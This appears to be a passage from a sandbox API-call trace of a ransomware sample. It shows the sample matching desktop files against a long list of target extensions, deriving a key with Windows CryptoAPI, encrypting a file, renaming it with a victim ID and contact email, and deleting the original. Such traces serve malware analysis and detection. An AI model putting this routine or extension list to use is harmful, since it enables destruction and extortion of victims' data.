.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.992] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.992] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.992] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.996] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x112d7, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x112d7, lpOverlapped=0x0) returned 1
	[0182.000] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.000] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0182.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.003] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0182.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.003] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0182.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.003] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0182.003] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.003] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x112d7, dwBufLen=0x112d7 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x112e0) returned 1
	[0182.006] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.006] RtlMoveMemory (in: Destination=0xfee460, Source=0xfdd180, Length=0x112d7 | out: Destination=0xfee460) 
	[0182.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.006] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfee460*, pdwDataLen=0x18bc0c*=0x112d7, dwBufLen=0x112e0 | out: pbData=0xfee460*, pdwDataLen=0x18bc0c*=0x112e0) returned 1
	[0182.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.009] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0182.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.009] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0182.009] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.009] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0182.010] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.010] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0182.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0182.011] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0182.075] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0182.075] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0182.086] WriteFile (in: hFile=0x388, lpBuffer=0xfee460*, nNumberOfBytesToWrite=0x112e0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfee460*, lpNumberOfBytesWritten=0x18c068*=0x112e0, lpOverlapped=0x0) returned 1
	[0182.091] CloseHandle (hObject=0x388) returned 1
	[0182.092] CloseHandle (hObject=0x384) returned 1
	[0182.092] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf")) returned 1
	[0182.101] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\evfxh0jnzn86.swf")) returned 0
	[0182.102] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84b9b450, ftCreationTime.dwHighDateTime=0x1d96b0d, ftLastAccessTime.dwLowDateTime=0x31531800, ftLastAccessTime.dwHighDateTime=0x1d96fa0, ftLastWriteTime.dwLowDateTime=0x31531800, ftLastWriteTime.dwHighDateTime=0x1d96fa0, nFileSizeHigh=0x0, nFileSizeLow=0xdb23, dwReserved0=0x0, dwReserved1=0x0, cFileName="gcfaL.avi", cAlternateFileName="")) returned 1
	[0182.102] lstrcmpW (lpString1="gcfaL.avi", lpString2="..") returned 1
	[0182.102] lstrcmpW (lpString1="gcfaL.avi", lpString2=".") returned 1
	[0182.102] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.102] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="gcfaL.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gcfaL.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gcfaL.avi"
	[0182.102] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gcfaL.avi") returned 39
	[0182.102] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.102] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gcfaL.avi", cchLength=0x27 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\gcfal.avi") returned 0x27
	[0182.102] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.103] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\gcfal.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.103] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\gcfal.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\gcfal.avi") returned="c:\\users\\rdhj0cnfevzx\\desktop\\gcfal.avi"
	[0182.103] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\gcfal.avi") returned 39
	[0182.103] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.103] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.103] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0182.104] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.104] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0182.104] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f05ee0, ftCreationTime.dwHighDateTime=0x1d9765a, ftLastAccessTime.dwLowDateTime=0x511ca420, ftLastAccessTime.dwHighDateTime=0x1d97690, ftLastWriteTime.dwLowDateTime=0x511ca420, ftLastWriteTime.dwHighDateTime=0x1d97690, nFileSizeHigh=0x0, nFileSizeLow=0x8f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="gHWknTr.avi", cAlternateFileName="")) returned 1
	[0182.104] lstrcmpW (lpString1="gHWknTr.avi", lpString2="..") returned 1
	[0182.104] lstrcmpW (lpString1="gHWknTr.avi", lpString2=".") returned 1
	[0182.104] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0182.104] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="gHWknTr.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gHWknTr.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gHWknTr.avi"
	[0182.104] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gHWknTr.avi") returned 41
	[0182.104] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0182.105] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\gHWknTr.avi", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\ghwkntr.avi") returned 0x29
	[0182.105] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.105] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\ghwkntr.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0182.105] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\ghwkntr.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\ghwkntr.avi") returned="c:\\users\\rdhj0cnfevzx\\desktop\\ghwkntr.avi"
	[0182.105] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\ghwkntr.avi") returned 41
	[0182.105] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0182.105] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.106] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0182.106] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0182.106] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe